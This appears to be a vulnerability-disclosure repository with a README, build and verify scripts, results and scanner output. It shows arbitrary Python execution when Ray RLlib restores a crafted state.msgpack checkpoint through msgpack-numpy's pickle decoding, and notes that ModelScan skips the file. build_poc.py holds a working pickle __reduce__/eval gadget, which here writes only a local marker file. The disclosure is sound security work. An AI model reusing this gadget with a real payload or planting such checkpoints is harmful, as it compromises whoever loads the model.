Upload folder using huggingface_hub
Browse files- README.md +107 -0
- artifact_manifest.json +8 -0
- build_poc.py +64 -0
- requirements.txt +5 -0
- results.json +44 -0
- scanner_output_dir.json +1 -0
- scanner_output_file.json +1 -0
- state.msgpack +3 -0
- verify_poc.py +141 -0
README.md
ADDED
|
@@ -0,0 +1,107 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
# Benign MessagePack / RLlib Checkpoint Security PoC
|
| 2 |
+
|
| 3 |
+
This repository stages a safe proof-of-concept for a MessagePack-based ML checkpoint loading issue. The artifact is a tiny `state.msgpack` file that follows the Ray RLlib checkpoint state-file shape and carries a NumPy object-dtype array encoded through `msgpack-numpy`.
|
| 4 |
+
|
| 5 |
+
When decoded through Ray RLlib's `restore_from_path()` MessagePack path, the current `msgpack-numpy` decoder reaches `pickle.loads()` for object-dtype array data. The embedded payload only writes a local marker file named `MSG_PACK_NUMPY_MARKER.txt`.
|
| 6 |
+
|
| 7 |
+
## Files
|
| 8 |
+
|
| 9 |
+
- `state.msgpack` - benign PoC checkpoint state file.
|
| 10 |
+
- `verify_poc.py` - verifies plain MessagePack parsing, direct `msgpack-numpy` parsing, and Ray RLlib restore behavior.
|
| 11 |
+
- `build_poc.py` - reproduces the artifact generation.
|
| 12 |
+
- `artifact_manifest.json` - SHA256, size, and marker details.
|
| 13 |
+
- `results.json` - local verification output.
|
| 14 |
+
- `scanner_output_file.json` - ModelScan 0.8.8 output for `state.msgpack`.
|
| 15 |
+
- `scanner_output_dir.json` - ModelScan 0.8.8 output for this staged folder.
|
| 16 |
+
- `requirements.txt` - pinned reproduction dependencies used for this validation.
|
| 17 |
+
|
| 18 |
+
## Tested Versions
|
| 19 |
+
|
| 20 |
+
- Python 3.12.12
|
| 21 |
+
- Ray 2.55.1
|
| 22 |
+
- msgpack 1.1.2
|
| 23 |
+
- msgpack-numpy 0.4.8
|
| 24 |
+
- NumPy 2.4.4
|
| 25 |
+
- ModelScan 0.8.8
|
| 26 |
+
|
| 27 |
+
## Reproduction
|
| 28 |
+
|
| 29 |
+
```bash
|
| 30 |
+
python -m venv .venv
|
| 31 |
+
.venv/Scripts/python -m pip install -r requirements.txt
|
| 32 |
+
.venv/Scripts/python build_poc.py
|
| 33 |
+
.venv/Scripts/python verify_poc.py
|
| 34 |
+
.venv/Scripts/modelscan -p state.msgpack -r json -o scanner_output_file.json --show-skipped
|
| 35 |
+
```
|
| 36 |
+
|
| 37 |
+
On Linux/macOS, replace `.venv/Scripts/python` with `.venv/bin/python`.
|
| 38 |
+
|
| 39 |
+
Expected behavior:
|
| 40 |
+
|
| 41 |
+
- Plain `msgpack.load()` parses the file as data and does not create the marker.
|
| 42 |
+
- `msgpack_numpy.load()` creates `MSG_PACK_NUMPY_MARKER.txt`.
|
| 43 |
+
- Ray RLlib `Checkpointable.restore_from_path()` creates `MSG_PACK_NUMPY_MARKER.txt`.
|
| 44 |
+
- ModelScan 0.8.8 reports `total_scanned: 0` and skips `state.msgpack` as `SCAN_NOT_SUPPORTED`.
|
| 45 |
+
|
| 46 |
+
## Evidence Summary
|
| 47 |
+
|
| 48 |
+
Artifact:
|
| 49 |
+
|
| 50 |
+
```text
|
| 51 |
+
SHA256: 3ddf739096ea87558f341e1705b607510e7e7f3af4c37841b51bd8809b52e465
|
| 52 |
+
Size: 506 bytes
|
| 53 |
+
```
|
| 54 |
+
|
| 55 |
+
Runtime:
|
| 56 |
+
|
| 57 |
+
```json
|
| 58 |
+
"ray_rllib_restore_check": {
|
| 59 |
+
"restored_keys": ["format", "object_array", "safe_weights"],
|
| 60 |
+
"object_array_type": "ndarray",
|
| 61 |
+
"object_array_repr": "array([34], dtype=object)",
|
| 62 |
+
"marker_created": true,
|
| 63 |
+
"marker_text": "msgpack_numpy_object_array_marker\n"
|
| 64 |
+
}
|
| 65 |
+
```
|
| 66 |
+
|
| 67 |
+
Scanner:
|
| 68 |
+
|
| 69 |
+
```json
|
| 70 |
+
"scanned": {"total_scanned": 0},
|
| 71 |
+
"skipped": {
|
| 72 |
+
"total_skipped": 1,
|
| 73 |
+
"skipped_files": [{
|
| 74 |
+
"category": "SCAN_NOT_SUPPORTED",
|
| 75 |
+
"description": "Model Scan did not scan file",
|
| 76 |
+
"source": "state.msgpack"
|
| 77 |
+
}]
|
| 78 |
+
}
|
| 79 |
+
```
|
| 80 |
+
|
| 81 |
+
## Why This Is ML-Format Relevant
|
| 82 |
+
|
| 83 |
+
Ray RLlib documents checkpoints as model/training artifacts that can be saved to local disk or cloud storage and restored through `restore_from_path()` / `from_checkpoint()`. The docs state that checkpoint directories contain a `pickle` or `msgpack` state file, and current RLlib source loads `state.msgpack` with a `msgpack` module patched by `msgpack-numpy`.
|
| 84 |
+
|
| 85 |
+
Primary references:
|
| 86 |
+
|
| 87 |
+
- Ray RLlib checkpoint docs: https://docs.ray.io/en/latest/rllib/checkpoints.html
|
| 88 |
+
- Ray RLlib source for `state.msgpack` restore and `try_import_msgpack`: https://docs.ray.io/en/latest/_modules/ray/rllib/utils/checkpoints.html
|
| 89 |
+
- msgpack-numpy 0.4.8 decoder source: https://github.com/lebedov/msgpack-numpy/blob/0.4.8/msgpack_numpy.py
|
| 90 |
+
- ModelScan 0.8.8 supported scanner extensions: https://github.com/protectai/modelscan/blob/v0.8.8/modelscan/settings.py
|
| 91 |
+
|
| 92 |
+
## Security Impact
|
| 93 |
+
|
| 94 |
+
An attacker-controlled RLlib `.msgpack` checkpoint state file can trigger arbitrary Python execution when a victim restores the checkpoint through RLlib's MessagePack path. This PoC uses a harmless local marker write, but the primitive is Python pickle execution hidden inside a MessagePack/NumPy serialization layer.
|
| 95 |
+
|
| 96 |
+
Limitations:
|
| 97 |
+
|
| 98 |
+
- This is not a native parser memory-corruption issue.
|
| 99 |
+
- It requires a victim workflow that restores an untrusted Ray RLlib MessagePack checkpoint or otherwise decodes the artifact through `msgpack-numpy`.
|
| 100 |
+
- The scanner evidence is a ModelScan unsupported-format gap for a dangerous `.msgpack` artifact, not a claim that every Hugging Face scanner accepts the file as clean.
|
| 101 |
+
|
| 102 |
+
## Mitigations
|
| 103 |
+
|
| 104 |
+
- Do not restore untrusted RLlib MessagePack checkpoints.
|
| 105 |
+
- Reject or sanitize object-dtype arrays during MessagePack checkpoint restore.
|
| 106 |
+
- Avoid `msgpack_numpy.patch()` for untrusted checkpoint data, or make the object-dtype pickle path opt-in only.
|
| 107 |
+
- Add scanner support for `.msgpack` model artifacts that recursively detects nested pickle payloads in `msgpack-numpy` object-array records.
|
artifact_manifest.json
ADDED
|
@@ -0,0 +1,8 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
{
|
| 2 |
+
"artifact": "state.msgpack",
|
| 3 |
+
"sha256": "3ddf739096ea87558f341e1705b607510e7e7f3af4c37841b51bd8809b52e465",
|
| 4 |
+
"size_bytes": 506,
|
| 5 |
+
"marker_file": "MSG_PACK_NUMPY_MARKER.txt",
|
| 6 |
+
"marker_text": "msgpack_numpy_object_array_marker",
|
| 7 |
+
"impact": "Benign marker file is created when a loader decodes the object-dtype array through msgpack-numpy."
|
| 8 |
+
}
|
build_poc.py
ADDED
|
@@ -0,0 +1,64 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
#!/usr/bin/env python
|
| 2 |
+
"""Build a benign Ray RLlib MessagePack checkpoint PoC artifact."""
|
| 3 |
+
|
| 4 |
+
from __future__ import annotations
|
| 5 |
+
|
| 6 |
+
import hashlib
|
| 7 |
+
import json
|
| 8 |
+
from pathlib import Path
|
| 9 |
+
|
| 10 |
+
import msgpack_numpy
|
| 11 |
+
import numpy as np
|
| 12 |
+
|
| 13 |
+
|
| 14 |
+
ARTIFACT_NAME = "state.msgpack"
|
| 15 |
+
MARKER_NAME = "MSG_PACK_NUMPY_MARKER.txt"
|
| 16 |
+
MARKER_TEXT = "msgpack_numpy_object_array_marker\n"
|
| 17 |
+
|
| 18 |
+
|
| 19 |
+
class Marker:
|
| 20 |
+
def __reduce__(self):
|
| 21 |
+
# Benign local marker-file proof. No network, persistence, or destructive action.
|
| 22 |
+
code = (
|
| 23 |
+
"__import__('pathlib').Path(%r).write_text(%r, encoding='utf-8')"
|
| 24 |
+
% (MARKER_NAME, MARKER_TEXT)
|
| 25 |
+
)
|
| 26 |
+
return (eval, (code,))
|
| 27 |
+
|
| 28 |
+
|
| 29 |
+
def sha256(path: Path) -> str:
|
| 30 |
+
digest = hashlib.sha256()
|
| 31 |
+
with path.open("rb") as handle:
|
| 32 |
+
for chunk in iter(lambda: handle.read(1024 * 1024), b""):
|
| 33 |
+
digest.update(chunk)
|
| 34 |
+
return digest.hexdigest()
|
| 35 |
+
|
| 36 |
+
|
| 37 |
+
def main() -> None:
|
| 38 |
+
out_dir = Path(__file__).resolve().parent
|
| 39 |
+
artifact = out_dir / ARTIFACT_NAME
|
| 40 |
+
|
| 41 |
+
state = {
|
| 42 |
+
"format": "ray_rllib_state_msgpack",
|
| 43 |
+
"safe_weights": np.array([1.0, 2.0, 3.0], dtype=np.float32),
|
| 44 |
+
"object_array": np.array([Marker()], dtype=object),
|
| 45 |
+
}
|
| 46 |
+
artifact.write_bytes(msgpack_numpy.packb(state, use_bin_type=True))
|
| 47 |
+
|
| 48 |
+
manifest = {
|
| 49 |
+
"artifact": ARTIFACT_NAME,
|
| 50 |
+
"sha256": sha256(artifact),
|
| 51 |
+
"size_bytes": artifact.stat().st_size,
|
| 52 |
+
"marker_file": MARKER_NAME,
|
| 53 |
+
"marker_text": MARKER_TEXT.strip(),
|
| 54 |
+
"impact": "Benign marker file is created when a loader decodes the object-dtype array through msgpack-numpy.",
|
| 55 |
+
}
|
| 56 |
+
(out_dir / "artifact_manifest.json").write_text(
|
| 57 |
+
json.dumps(manifest, indent=2) + "\n",
|
| 58 |
+
encoding="utf-8",
|
| 59 |
+
)
|
| 60 |
+
print(json.dumps(manifest, indent=2))
|
| 61 |
+
|
| 62 |
+
|
| 63 |
+
if __name__ == "__main__":
|
| 64 |
+
main()
|
requirements.txt
ADDED
|
@@ -0,0 +1,5 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
ray[rllib]==2.55.1
|
| 2 |
+
msgpack==1.1.2
|
| 3 |
+
msgpack-numpy==0.4.8
|
| 4 |
+
numpy==2.4.4
|
| 5 |
+
modelscan==0.8.8
|
results.json
ADDED
|
@@ -0,0 +1,44 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
{
|
| 2 |
+
"artifact": "C:\\Users\\Pragnyan\\dev\\huntr-exp1\\messagepack\\hf_messagepack_poc\\state.msgpack",
|
| 3 |
+
"artifact_sha256": "3ddf739096ea87558f341e1705b607510e7e7f3af4c37841b51bd8809b52e465",
|
| 4 |
+
"artifact_size_bytes": 506,
|
| 5 |
+
"versions": {
|
| 6 |
+
"python": "3.12.12 (main, Oct 28 2025, 14:15:42) [MSC v.1944 64 bit (AMD64)]",
|
| 7 |
+
"ray": "2.55.1",
|
| 8 |
+
"msgpack": "1.1.2",
|
| 9 |
+
"msgpack-numpy": "0.4.8",
|
| 10 |
+
"numpy": "2.4.4",
|
| 11 |
+
"modelscan": "0.8.8"
|
| 12 |
+
},
|
| 13 |
+
"plain_msgpack_check": {
|
| 14 |
+
"plain_msgpack_type": "dict",
|
| 15 |
+
"plain_msgpack_keys": [
|
| 16 |
+
"format",
|
| 17 |
+
"object_array",
|
| 18 |
+
"safe_weights"
|
| 19 |
+
],
|
| 20 |
+
"marker_created": false
|
| 21 |
+
},
|
| 22 |
+
"direct_msgpack_numpy_check": {
|
| 23 |
+
"msgpack_numpy_type": "dict",
|
| 24 |
+
"msgpack_numpy_keys": [
|
| 25 |
+
"format",
|
| 26 |
+
"object_array",
|
| 27 |
+
"safe_weights"
|
| 28 |
+
],
|
| 29 |
+
"marker_created": true,
|
| 30 |
+
"marker_text": "msgpack_numpy_object_array_marker\n"
|
| 31 |
+
},
|
| 32 |
+
"ray_rllib_restore_check": {
|
| 33 |
+
"restored_keys": [
|
| 34 |
+
"format",
|
| 35 |
+
"object_array",
|
| 36 |
+
"safe_weights"
|
| 37 |
+
],
|
| 38 |
+
"object_array_type": "ndarray",
|
| 39 |
+
"object_array_repr": "array([34], dtype=object)",
|
| 40 |
+
"marker_created": true,
|
| 41 |
+
"marker_text": "msgpack_numpy_object_array_marker\n"
|
| 42 |
+
},
|
| 43 |
+
"limitation": "This is ACE via msgpack-numpy object-array pickle decoding during RLlib msgpack checkpoint restore; it is not a native parser memory-corruption issue."
|
| 44 |
+
}
|
scanner_output_dir.json
ADDED
|
@@ -0,0 +1 @@
|
|
|
|
|
|
|
| 1 |
+
{"summary": {"total_issues_by_severity": {"LOW": 0, "MEDIUM": 0, "HIGH": 0, "CRITICAL": 0}, "total_issues": 0, "input_path": ".", "absolute_path": "C:\\Users\\Pragnyan\\dev\\huntr-exp1\\messagepack\\hf_messagepack_poc", "modelscan_version": "0.8.8", "timestamp": "2026-05-12T12:55:25.546341", "scanned": {"total_scanned": 0}, "skipped": {"total_skipped": 7, "skipped_files": [{"category": "SCAN_NOT_SUPPORTED", "description": "Model Scan did not scan file", "source": "artifact_manifest.json"}, {"category": "SCAN_NOT_SUPPORTED", "description": "Model Scan did not scan file", "source": "build_poc.py"}, {"category": "SCAN_NOT_SUPPORTED", "description": "Model Scan did not scan file", "source": "results.json"}, {"category": "SCAN_NOT_SUPPORTED", "description": "Model Scan did not scan file", "source": "scanner_output_dir.json"}, {"category": "SCAN_NOT_SUPPORTED", "description": "Model Scan did not scan file", "source": "scanner_output_file.json"}, {"category": "SCAN_NOT_SUPPORTED", "description": "Model Scan did not scan file", "source": "state.msgpack"}, {"category": "SCAN_NOT_SUPPORTED", "description": "Model Scan did not scan file", "source": "verify_poc.py"}]}}, "issues": [], "errors": []}
|
scanner_output_file.json
ADDED
|
@@ -0,0 +1 @@
|
|
|
|
|
|
|
| 1 |
+
{"summary": {"total_issues_by_severity": {"LOW": 0, "MEDIUM": 0, "HIGH": 0, "CRITICAL": 0}, "total_issues": 0, "input_path": "state.msgpack", "absolute_path": "C:\\Users\\Pragnyan\\dev\\huntr-exp1\\messagepack\\hf_messagepack_poc", "modelscan_version": "0.8.8", "timestamp": "2026-05-12T12:55:25.524512", "scanned": {"total_scanned": 0}, "skipped": {"total_skipped": 1, "skipped_files": [{"category": "SCAN_NOT_SUPPORTED", "description": "Model Scan did not scan file", "source": "state.msgpack"}]}}, "issues": [], "errors": []}
|
state.msgpack
ADDED
|
@@ -0,0 +1,3 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
version https://git-lfs.github.com/spec/v1
|
| 2 |
+
oid sha256:3ddf739096ea87558f341e1705b607510e7e7f3af4c37841b51bd8809b52e465
|
| 3 |
+
size 506
|
verify_poc.py
ADDED
|
@@ -0,0 +1,141 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
#!/usr/bin/env python
|
| 2 |
+
"""Verify the benign MessagePack/model checkpoint deserialization PoC."""
|
| 3 |
+
|
| 4 |
+
from __future__ import annotations
|
| 5 |
+
|
| 6 |
+
import argparse
|
| 7 |
+
import hashlib
|
| 8 |
+
import importlib.metadata as metadata
|
| 9 |
+
import json
|
| 10 |
+
import sys
|
| 11 |
+
from pathlib import Path
|
| 12 |
+
from typing import Any, Dict, Optional, Tuple
|
| 13 |
+
|
| 14 |
+
import msgpack
|
| 15 |
+
import msgpack_numpy
|
| 16 |
+
import numpy as np
|
| 17 |
+
import ray
|
| 18 |
+
from ray.rllib.utils.checkpoints import Checkpointable
|
| 19 |
+
|
| 20 |
+
|
| 21 |
+
ARTIFACT_NAME = "state.msgpack"
|
| 22 |
+
MARKER_NAME = "MSG_PACK_NUMPY_MARKER.txt"
|
| 23 |
+
|
| 24 |
+
|
| 25 |
+
class DemoCheckpointable(Checkpointable):
|
| 26 |
+
def __init__(self) -> None:
|
| 27 |
+
self.restored_state: Optional[Dict[str, Any]] = None
|
| 28 |
+
|
| 29 |
+
def get_state(self, components=None, *, not_components=None, **kwargs):
|
| 30 |
+
return {}
|
| 31 |
+
|
| 32 |
+
def set_state(self, state):
|
| 33 |
+
self.restored_state = state
|
| 34 |
+
|
| 35 |
+
def get_ctor_args_and_kwargs(self) -> Tuple[Tuple, Dict[str, Any]]:
|
| 36 |
+
return (), {}
|
| 37 |
+
|
| 38 |
+
|
| 39 |
+
def sha256(path: Path) -> str:
|
| 40 |
+
digest = hashlib.sha256()
|
| 41 |
+
with path.open("rb") as handle:
|
| 42 |
+
for chunk in iter(lambda: handle.read(1024 * 1024), b""):
|
| 43 |
+
digest.update(chunk)
|
| 44 |
+
return digest.hexdigest()
|
| 45 |
+
|
| 46 |
+
|
| 47 |
+
def package_version(name: str) -> str:
|
| 48 |
+
try:
|
| 49 |
+
return metadata.version(name)
|
| 50 |
+
except metadata.PackageNotFoundError:
|
| 51 |
+
return "not installed"
|
| 52 |
+
|
| 53 |
+
|
| 54 |
+
def plain_msgpack_check(artifact: Path, marker: Path) -> Dict[str, Any]:
|
| 55 |
+
marker.unlink(missing_ok=True)
|
| 56 |
+
with artifact.open("rb") as handle:
|
| 57 |
+
data = msgpack.load(handle, raw=False, strict_map_key=False)
|
| 58 |
+
return {
|
| 59 |
+
"plain_msgpack_type": type(data).__name__,
|
| 60 |
+
"plain_msgpack_keys": sorted(str(k) for k in data.keys()),
|
| 61 |
+
"marker_created": marker.exists(),
|
| 62 |
+
}
|
| 63 |
+
|
| 64 |
+
|
| 65 |
+
def rllib_restore_check(checkpoint_dir: Path, marker: Path) -> Dict[str, Any]:
|
| 66 |
+
marker.unlink(missing_ok=True)
|
| 67 |
+
demo = DemoCheckpointable()
|
| 68 |
+
demo.restore_from_path(checkpoint_dir)
|
| 69 |
+
restored = demo.restored_state or {}
|
| 70 |
+
marker_text = marker.read_text(encoding="utf-8") if marker.exists() else None
|
| 71 |
+
object_value = restored.get("object_array")
|
| 72 |
+
return {
|
| 73 |
+
"restored_keys": sorted(restored.keys()),
|
| 74 |
+
"object_array_type": type(object_value).__name__,
|
| 75 |
+
"object_array_repr": repr(object_value),
|
| 76 |
+
"marker_created": marker.exists(),
|
| 77 |
+
"marker_text": marker_text,
|
| 78 |
+
}
|
| 79 |
+
|
| 80 |
+
|
| 81 |
+
def direct_msgpack_numpy_check(artifact: Path, marker: Path) -> Dict[str, Any]:
|
| 82 |
+
marker.unlink(missing_ok=True)
|
| 83 |
+
with artifact.open("rb") as handle:
|
| 84 |
+
data = msgpack_numpy.load(handle, raw=False, strict_map_key=False)
|
| 85 |
+
marker_text = marker.read_text(encoding="utf-8") if marker.exists() else None
|
| 86 |
+
return {
|
| 87 |
+
"msgpack_numpy_type": type(data).__name__,
|
| 88 |
+
"msgpack_numpy_keys": sorted(data.keys()),
|
| 89 |
+
"marker_created": marker.exists(),
|
| 90 |
+
"marker_text": marker_text,
|
| 91 |
+
}
|
| 92 |
+
|
| 93 |
+
|
| 94 |
+
def main() -> None:
|
| 95 |
+
parser = argparse.ArgumentParser()
|
| 96 |
+
parser.add_argument(
|
| 97 |
+
"--artifact",
|
| 98 |
+
type=Path,
|
| 99 |
+
default=Path(__file__).resolve().parent / ARTIFACT_NAME,
|
| 100 |
+
)
|
| 101 |
+
parser.add_argument(
|
| 102 |
+
"--results",
|
| 103 |
+
type=Path,
|
| 104 |
+
default=Path(__file__).resolve().parent / "results.json",
|
| 105 |
+
)
|
| 106 |
+
args = parser.parse_args()
|
| 107 |
+
|
| 108 |
+
artifact = args.artifact.resolve()
|
| 109 |
+
checkpoint_dir = artifact.parent
|
| 110 |
+
marker = Path.cwd() / MARKER_NAME
|
| 111 |
+
|
| 112 |
+
if not artifact.exists():
|
| 113 |
+
raise FileNotFoundError(artifact)
|
| 114 |
+
|
| 115 |
+
results = {
|
| 116 |
+
"artifact": str(artifact),
|
| 117 |
+
"artifact_sha256": sha256(artifact),
|
| 118 |
+
"artifact_size_bytes": artifact.stat().st_size,
|
| 119 |
+
"versions": {
|
| 120 |
+
"python": sys.version,
|
| 121 |
+
"ray": ray.__version__,
|
| 122 |
+
"msgpack": package_version("msgpack"),
|
| 123 |
+
"msgpack-numpy": package_version("msgpack-numpy"),
|
| 124 |
+
"numpy": np.__version__,
|
| 125 |
+
"modelscan": package_version("modelscan"),
|
| 126 |
+
},
|
| 127 |
+
"plain_msgpack_check": plain_msgpack_check(artifact, marker),
|
| 128 |
+
"direct_msgpack_numpy_check": direct_msgpack_numpy_check(artifact, marker),
|
| 129 |
+
"ray_rllib_restore_check": rllib_restore_check(checkpoint_dir, marker),
|
| 130 |
+
"limitation": "This is ACE via msgpack-numpy object-array pickle decoding during RLlib msgpack checkpoint restore; it is not a native parser memory-corruption issue.",
|
| 131 |
+
}
|
| 132 |
+
|
| 133 |
+
args.results.write_text(json.dumps(results, indent=2, default=str) + "\n", encoding="utf-8")
|
| 134 |
+
print(json.dumps(results, indent=2, default=str))
|
| 135 |
+
|
| 136 |
+
if not results["ray_rllib_restore_check"]["marker_created"]:
|
| 137 |
+
raise SystemExit("marker was not created through Ray RLlib restore path")
|
| 138 |
+
|
| 139 |
+
|
| 140 |
+
if __name__ == "__main__":
|
| 141 |
+
main()
|